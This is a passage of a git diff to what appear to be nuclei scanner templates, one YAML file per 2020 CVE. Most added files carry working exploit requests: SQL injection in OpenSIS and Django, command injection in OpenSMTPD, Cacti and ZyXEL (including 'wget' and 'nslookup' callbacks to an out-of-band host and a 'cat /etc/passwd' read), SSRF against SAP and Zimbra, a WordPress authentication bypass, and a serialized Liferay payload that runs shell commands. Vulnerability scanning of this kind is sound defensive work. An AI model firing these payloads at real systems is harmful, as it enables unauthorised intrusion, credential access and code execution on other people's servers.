+ author: madrobot
+ severity: medium
+ reference: https://github.com/InitRoot/CVE-2020-6308-PoC
+ tags: cve,cve2020,sap,ssrf,oob
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
+
+ body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml
new file mode 100644
index 0000000000..be79509f04
--- /dev/null
+++ b/cves/2020/CVE-2020-6637.yaml
@@ -0,0 +1,40 @@
+id: CVE-2020-6637
+
+info:
+ name: OpenSIS v7.3 unauthenticated SQL injection
+ author: pikpikcu
+ severity: high
+ description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
+ tags: cve,cve2020,sqli,opensis
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-6637
+ - https://cinzinga.com/CVE-2020-6637/
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/account/index.php'
+ - '{{BaseURL}}/opensis/index.php'
+ - '{{BaseURL}}/index.php'
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'SQL STATEMENT:'
+ - " UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -') "
+ condition: and
+ - type: word
+ part: header
+ words:
+ - "text/html"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml
index 505a0a7e69..74841a4ce3 100644
--- a/cves/2020/CVE-2020-7209.yaml
+++ b/cves/2020/CVE-2020-7209.yaml
@@ -5,13 +5,18 @@ info:
author: dwisiswant0
severity: critical
tags: cve,cve2020,rce
+ description: LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2.
+ reference:
+ http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html
+ http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html
+ https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- # venedor: https://www.hpe.com/us/en/home.html
- # softwar: https://github.com/HewlettPackard/LinuxKI
+ # vendor: https://www.hpe.com/us/en/home.html
+ # software: https://github.com/HewlettPackard/LinuxKI
requests:
- method: GET
@@ -22,5 +27,5 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml
new file mode 100644
index 0000000000..f040fb2e36
--- /dev/null
+++ b/cves/2020/CVE-2020-7247.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-7247
+info:
+ name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
+ author: princechaddha
+ severity: critical
+ reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
+ tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
+
+network:
+ - inputs:
+ - read: 1024
+ - data: "helo target\r\n"
+ read: 1024
+ - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
+ read: 1024
+ - data: "RCPT TO:\r\n"
+ read: 1024
+ - data: "DATA\r\n"
+ read: 1024
+ - data: "\r\nxxxx\r\n.\r\n"
+ read: 1024
+ - data: "QUIT\r\n"
+ read: 1024
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:25"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: raw
+ words:
+ - "Message accepted for delivery"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml
new file mode 100644
index 0000000000..6f02ee6688
--- /dev/null
+++ b/cves/2020/CVE-2020-7796.yaml
@@ -0,0 +1,25 @@
+id: CVE-2020-7796
+
+info:
+ name: Zimbra Collaboration Suite (ZCS) - SSRF
+ author: gy741
+ severity: critical
+ description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
+ reference: |
+ - https://www.adminxe.com/2183.html
+ tags: cve,cve2020,zimbra,ssrf,oob
+
+requests:
+ - raw:
+ - |
+ GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
+ Host: {{Hostname}}
+ User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index 3422bc8f3e..e552deef58 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -5,20 +5,16 @@ info:
author: dwisiswant0
severity: critical
tags: cve,cve2020,rce,liferay
-
- # Deserialization of Untrusted Data in
- # Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers
- # to execute arbitrary code via JSON web services (JSONWS).
- # -
- # References:
- # > https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
+ description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
+ reference: |
+ - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
+ - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
requests:
- payloads:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- - "sysctl kern.ostype" # macOS
attack: sniper
raw:
@@ -36,22 +32,22 @@ requests:
cmd2: §command§
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
+
matchers-condition: and
matchers:
- type: regex
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
- - "kern\\.ostype"
condition: or
part: body
- type: status
status:
- 200
+
extractors:
- type: regex
part: body
regex:
- "Microsoft Windows (.*)"
- - "kern\\.ostype: (.*)"
- "Distributor ID: (.*)"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-8091.yaml b/cves/2020/CVE-2020-8091.yaml
index ab94822a22..0e62f1aae1 100644
--- a/cves/2020/CVE-2020-8091.yaml
+++ b/cves/2020/CVE-2020-8091.yaml
@@ -4,7 +4,11 @@ info:
name: TYPO3 Cross-Site Scripting Vulnerability
author: dwisiswant0
severity: medium
+ description: svg.swf in TYPO3 6.2.0 to 6.2.38 ELTS and 7.0.0 to 7.1.0 could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack on a targeted system. This may be at a contrib/websvg/svg.swf pathname.
tags: cve,cve2020,xss
+ reference:
+ - https://typo3.org/security/advisory/typo3-psa-2019-003/
+ - https://www.purplemet.com/blog/typo3-xss-vulnerability
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml
index 65f5b55b14..a489c499a7 100644
--- a/cves/2020/CVE-2020-8115.yaml
+++ b/cves/2020/CVE-2020-8115.yaml
@@ -2,8 +2,13 @@ id: CVE-2020-8115
info:
name: Revive Adserver XSS
- author: madrobot & dwisiswant0
+ author: madrobot,dwisiswant0
severity: medium
+ description: |
+ A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
+ reference: |
+ - https://hackerone.com/reports/775693
+ - https://www.revive-adserver.com/security/revive-sa-2020-001/
tags: cve,cve2020,xss
requests:
diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml
index ea48d877d8..396f4c1b06 100644
--- a/cves/2020/CVE-2020-8163.yaml
+++ b/cves/2020/CVE-2020-8163.yaml
@@ -19,5 +19,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml
index f16a12fb74..4a7f5a15fd 100644
--- a/cves/2020/CVE-2020-8191.yaml
+++ b/cves/2020/CVE-2020-8191.yaml
@@ -5,6 +5,9 @@ info:
author: dwisiswant0
severity: high
tags: cve,cve2020,citrix,xss
+ reference: https://support.citrix.com/article/CTX276688
+ description: |
+ Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
requests:
- raw:
@@ -31,3 +34,8 @@ requests:
- type: status
status:
- 200
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml
index 29d94a91c0..3ff654e589 100644
--- a/cves/2020/CVE-2020-8193.yaml
+++ b/cves/2020/CVE-2020-8193.yaml
@@ -4,8 +4,11 @@ info:
name: Citrix unauthenticated LFI
author: pdteam
severity: high
- reference: https://github.com/jas502n/CVE-2020-8193
- tags: cve,cve2020,citrix,traversal
+ reference:
+ - https://github.com/jas502n/CVE-2020-8193
+ - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html
+ description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.
+ tags: cve,cve2020,citrix,lfi
requests:
- raw:
@@ -84,5 +87,5 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml
index e712d2c4c9..874d9e5856 100644
--- a/cves/2020/CVE-2020-8194.yaml
+++ b/cves/2020/CVE-2020-8194.yaml
@@ -5,6 +5,10 @@ info:
author: dwisiswant0
severity: high
tags: cve,cve2020,citrix
+ description: |
+ Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
+ reference:
+ - https://support.citrix.com/article/CTX276688
requests:
- raw:
diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml
index 0fd132ae83..ab58540906 100644
--- a/cves/2020/CVE-2020-8209.yaml
+++ b/cves/2020/CVE-2020-8209.yaml
@@ -11,7 +11,7 @@ info:
References:
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
- tags: cve,cve2020,citrix,traversal
+ tags: cve,cve2020,citrix,lfi
requests:
- method: GET
@@ -21,7 +21,7 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
- type: word
words:
diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml
index 9caafcf489..f7b28604d5 100644
--- a/cves/2020/CVE-2020-8512.yaml
+++ b/cves/2020/CVE-2020-8512.yaml
@@ -2,14 +2,14 @@ id: CVE-2020-8512
info:
name: IceWarp WebMail XSS
- author: pdnuclei & dwisiswant0
+ author: pdteam,dwisiswant0
severity: medium
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
- reference: https://www.exploit-db.com/exploits/47988
+ reference: |
+ - https://www.exploit-db.com/exploits/47988
+ - https://twitter.com/sagaryadav8742/status/1275170967527006208
tags: cve,cve2020,xss
- # https://twitter.com/sagaryadav8742/status/1275170967527006208
-
requests:
- method: GET
path:
diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml
index 0b540a1796..21148d4956 100644
--- a/cves/2020/CVE-2020-8515.yaml
+++ b/cves/2020/CVE-2020-8515.yaml
@@ -4,13 +4,12 @@ info:
name: DrayTek pre-auth RCE
author: pikpikcu
severity: critical
- reference: https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
+ description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
+ reference: |
+ - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
+ - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
tags: cve,cve2020,rce
- # References:
- # https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
- # https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
-
requests:
- raw:
- |
@@ -26,7 +25,7 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
- type: status
diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml
new file mode 100644
index 0000000000..5cf989eb97
--- /dev/null
+++ b/cves/2020/CVE-2020-8771.yaml
@@ -0,0 +1,49 @@
+id: CVE-2020-8771
+
+info:
+ name: WordPress WP Time Capsule Authentication Bypass
+ author: princechaddha
+ severity: critical
+ reference: https://github.com/SECFORCE/WPTimeCapsulePOC
+ tags: cve,cve2020,wordpress,wp-plugin
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ IWP_JSON_PREFIX
+
+ - |
+ GET /wp-admin/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ - "
Dashboard "
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - 'text/html'
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: header
+ regex:
+ - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml
new file mode 100644
index 0000000000..586fc0dfb9
--- /dev/null
+++ b/cves/2020/CVE-2020-8813.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-8813
+
+info:
+ name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
+ author: gy741
+ severity: critical
+ description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
+ reference: |
+ - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
+ tags: cve,cve2020,cacti,rce,oob
+
+requests:
+ - raw:
+ - |
+ GET /graph_realtime.php?action=init HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.18.4
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+ Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml
index 536b67e2e7..74819b7066 100644
--- a/cves/2020/CVE-2020-8982.yaml
+++ b/cves/2020/CVE-2020-8982.yaml
@@ -5,7 +5,8 @@ info:
author: dwisiswant0
severity: high
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
- tags: cve,cve2020,citrix,traversal
+ tags: cve,cve2020,citrix,lfi
+ reference: https://support.citrix.com/article/CTX269106
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml
new file mode 100644
index 0000000000..30caec3bae
--- /dev/null
+++ b/cves/2020/CVE-2020-9036.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-9036
+
+info:
+ name: Jeedom through 4.0.38 allows XSS
+ author: pikpikcu
+ severity: medium
+ reference: |
+ - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
+ tags: cve,cve2020,xss,jeedom
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml
index 3f8b1b339b..9a514eb66f 100644
--- a/cves/2020/CVE-2020-9047.yaml
+++ b/cves/2020/CVE-2020-9047.yaml
@@ -16,8 +16,10 @@ info:
download and run a malicious executable that
could allow OS command injection on the system.
- Source/References:
+ reference: |
- https://github.com/norrismw/CVE-2020-9047
+ - https://www.johnsoncontrols.com/cyber-solutions/security-advisories
+ - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01
tags: cve,cve2020,rce
requests:
diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml
new file mode 100644
index 0000000000..34d1904962
--- /dev/null
+++ b/cves/2020/CVE-2020-9054.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-9054
+
+info:
+ name: ZyXEL NAS RCE
+ author: dhiyaneshDk
+ severity: critical
+ description: |
+ Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device.
+ ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it.
+ If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device.
+ Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges.
+ As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges.
+ By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device.
+ This may happen by directly connecting to a device if it is directly exposed to an attacker.
+ However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices.
+ For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system.
+ Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
+ reference: |
+ - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
+ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
+ tags: cve,cve2020,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml
new file mode 100644
index 0000000000..db8408c9f2
--- /dev/null
+++ b/cves/2020/CVE-2020-9315.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-9315
+
+info:
+ name: Oracle iPlanet Improper Authorization
+ author: dhiyaneshDk
+ severity: high
+ reference: https://www.cvebase.com/cve/2020/9315
+ tags: cve,cve2020,oracle
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
+ - "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Admin Console"
+
+ - type: word
+ words:
+ - "serverConfigurationsGeneral"
+ - "serverCertificatesGeneral"
+ condition: or
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml
index 0dd448d74a..1d5e78f380 100644
--- a/cves/2020/CVE-2020-9344.yaml
+++ b/cves/2020/CVE-2020-9344.yaml
@@ -6,10 +6,10 @@ info:
severity: medium
description: Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
tags: cve,cve2020,atlassian,jira,xss
-
-# source:- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
-# https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
-# https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
+ reference: |
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
+ - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
+ - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml
index 36bad92b91..66b1211b6b 100644
--- a/cves/2020/CVE-2020-9376.yaml
+++ b/cves/2020/CVE-2020-9376.yaml
@@ -8,8 +8,10 @@ info:
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
- References:
- - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
+ reference:
+ - https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
+ - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
+ - https://www.dlink.com.br/produto/dir-610/
tags: cve,cve2020,dlink
requests:
- method: POST
diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml
new file mode 100644
index 0000000000..fce8b70603
--- /dev/null
+++ b/cves/2020/CVE-2020-9402.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-9402
+
+info:
+ name: Django SQL Injection
+ description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
+ reference: |
+ - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
+ - https://docs.djangoproject.com/en/3.0/releases/security/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9402
+ author: geeknik
+ severity: high
+ tags: cve,cve2020,django,sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"
+
+ matchers:
+ - type: word
+ words:
+ - "DatabaseError at"
+ - "ORA-29257:"
+ - "ORA-06512:"
+ - "Request Method:"
+ condition: and
